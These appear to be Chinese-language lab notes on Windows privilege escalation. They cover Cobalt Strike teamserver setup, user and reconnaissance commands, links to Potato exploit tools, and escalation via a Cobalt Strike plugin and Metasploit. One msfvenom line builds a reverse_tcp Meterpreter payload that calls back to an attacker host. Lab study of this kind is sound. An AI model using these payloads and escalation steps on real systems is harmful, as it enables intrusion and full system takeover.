1.安装CS
软件:cs4.8
1.准备
解压压缩包,解压后有server和client两个文件,将client留在本机,server文件上传到自己的linux虚拟机或者是vps上(以下配置在阿里云vps上)
2.server
server中有这些文件
给teamserver和TeamServerImage配置权限
chmod +u teamserver
chmod +u TeamServerImage
启动teamserver(第一个参数填vps公网ip,第二个参数填客户端连接密码)
./teamserver [vps_ip] [passwd]
cs默认端口50050
如图,启动成功,服务端配置完成
3.client
本机上打开Cobalt_Strike_CN.vbs
host为vps_ip,端口50050,密码填在服务端配置的密码,点击连接
连接后进入如下界面,说明连接成功
2.windows用户组和用户
1.用户
windows不同的用户有着不同的权限,权限主要包括有:完全控制、修改、读取和执行、列出文件夹
内容、读取、写入;超级管理员和system用户权限最高
内置用户
Administrator,系统管理员账号,拥有完全控制权
guest,来宾账号,提供访问共享资源的网络用户使用,仅具有基本权限,默认被禁用
查看本地用户
net user
net user [username]
查看当前用户
whoami
whoami /all
用户操作
net user [username] [passwd]/add
net user [username] /del
net localgroup [groupname] [username] /add
net localgroup [groupname] [username] /del
2.用户组
用户也可以属于多个用户组,常见的用户组是管理组(Administrators)、普通用户组(Users)、iis用户组(IIS_IUSRS)、来宾组(Guests)、远程登录组(Remote Desktop Users)
内置用户组
administrators,管理员组
users组,新建用户默认所属的组
guests组,权限最低
iis_users组, Internet 信息服务使用的内置组
查看用户组
net localgroup
net localgroup [groupname]
3.windows信息搜集
当我们成功拿到普通用户权限时,可以通过执行一些命令拿到当前主机的配置和连接情况,方便之后的渗透以及帮助我们去寻找一些针对当前系统可以执行的exp或其他工具进行提权
常用命令
systeminfo #获取系统信息
whoami /all #获取当前用户的详细信息
whoami /priv #显示当前用户的安全特权
net start #查看服务
quser or query user #获取在线用户
dir c:\programdata\ #分析安装杀软
4.总结手工提权思路,拿土豆提权
手工提权思路
当我们进入主机能够执行主机cmd命令时,可以通过执行命令搜集当前系统版本,补丁信息,针对当前的版本去寻找exp
土豆提权
土豆家族,可以挨个尝试(每个土豆的执行命令不同,使用时根据土豆名称去搜使用方法)
https://github.com/BeichenDream/BadPotato
https://github.com/BeichenDream/GodPotato
https://github.com/CCob/SweetPotato
https://github.com/klezVirus/CandyPotato
https://github.com/antonioCoco/RoguePotato
https://github.com/S3cur3Th1sSh1t/MultiPotato
https://github.com/crisprss/RasmanPotato
https://github.com/wh0amitz/PetitPotato
https://github.com/antonioCoco/JuicyPotatoNG
https://github.com/BeichenDream/PrintNotifyPotato
https://github.com/Prepouce/CoercedPotato
5.用CS插件提权
1.新建监听器,http hosts选择服务端ip,http port(c2)随便设置一个空闲端口
2.生成并上传木马,该实验提权的机器为winserver2k12,所以选择windows可执行程序,监听器选择刚才新建的,将生成的木马上传至虚拟机
3.运行木马,监听器监测到被害机上线,可以看到当前权限为管理员
4.使用插件梼杌进行权限提升,可以看到有许多模块可供使用,这里使用甜土豆
可以看到新建一个权限为system的连接,提权成功
6.MSF提权
这里使用win2k12 server模拟受害机
1.生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.44.138 lport=12345 -f exe >msf.exe
lhost为kali的IP,lport为监听端口
2.上传木马到虚拟机
3.启动msf,使用模块监听,可以看到正在监听12345端口
3.运行受害机上木马,可看到已经建立连接,查看当前权限是管理员权限
4.meterpreter中有内置的提权命令getsystem
,成功率很低
但是这里居然成功了
5.msf中还有一种盗取令牌的改变权限方式,这里先使用该方式进行降权,再用exp提权
meterpreter > ps #列出当前主机上进程id和进程执行的权限
meterpreter > [pid] #将当前权限调整至进程号对应的权限,可升权可降权
6.退回到msf中,msf有自带的扫描模块post/multi/recon/local_exploit_suggester
,可以匹配适用的exp,扫描结果如下,显示yes的都是可能存在的漏洞,可以依次尝试
7.这里使用土豆ms16_075_reflection_juicy
进行提权操作
可以看到新建一个会话2,权限已经提升